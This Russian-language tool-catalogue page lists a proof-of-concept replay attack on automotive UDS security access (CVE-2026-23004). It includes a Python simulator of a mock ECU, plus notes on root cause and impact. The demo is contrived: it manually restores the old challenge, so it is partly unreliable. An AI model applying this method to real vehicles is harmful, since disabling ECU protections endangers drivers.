Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack — Эксплойт класса proof-of-concept, демонстрирующий обход аутентификации UDS через повторное использование ответа на challenge (challenge-response replay) в автомобильных ECU, с симулятором CAN-UDS на Python. | Kitploit
Инструменты/GitHubGitHub/george0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack
Аутентификация и авторизацияБезопасность встроенных системБезопасность IoTАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеБезопасность оборудования и IoT
GitHub

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
george0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack

CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack

Эксплойт класса proof-of-concept, демонстрирующий обход аутентификации UDS через повторное использование ответа на challenge (challenge-response replay) в автомобильных ECU, с симулятором CAN-UDS на Python.

Репозиторий
114 дней назадЕщё не проверено

CVE-2026-23004 – Обход аутентификации UDS в автомобильных системах при помощи атаки повторного воспроизведения

Программный код (симулятор Python CAN‑UDS)

root@kitploit:~
# uds_sim.py - ECU that authenticates with a simple challenge
import random, hashlib

class ECU:
    def __init__(self):
        self.secret = b'long_secret_key'
    def generate_challenge(self):
        self.challenge = random.randbytes(8)
        return self.challenge
    def verify_response(self, response):
        expected = hashlib.sha256(self.secret + self.challenge).digest()[:8]
        return response == expected
    def unlock(self):
        print("ECU unlocked! Critical functions accessible.")

# Attacker captures a valid challenge-response pair
ecu = ECU()
challenge = ecu.generate_challenge()
# Legitimate tool computes response (simplified)
response = hashlib.sha256(ecu.secret + challenge).digest()[:8]
ecu.verify_response(response)  # first unlock

# Replay the same challenge-response
ecu.challenge = challenge
ecu.verify_response(response)  # second unlock without new challenge - works
ecu.unlock()

CVE-2026-23004 – Обход аутентификации UDS в автомобильных системах при помощи повторного воспроизведения

Severity: High

Обзор

Автомобильный ЭБУ (ECU) реализует сервис защищённого доступа (security access) Unified Diagnostic Services (UDS) (сервис 0x27), но не обеспечивает одноразовое использование вызова. Злоумышленник может перехватить валидную пару «вызов-ответ» и воспроизвести её, чтобы обойти аутентификацию.

Детали уязвимости

  • Тип: Атака повторного воспроизведения
  • Воздействие: Несанкционированное программирование ЭБУ, отключение защитных функций.
  • Корневая причина: ЭБУ принимает любой ответ, совпадающий с текущим вызовом, но один и тот же вызов можно использовать повторно без аннулирования.

Демонстрация эксплуатации

Запустите симуляцию:

root@kitploit:~
python uds_sim.py

ЭБУ разблокируется дважды с одной и той же парой аутентификации.

Скачать инструмент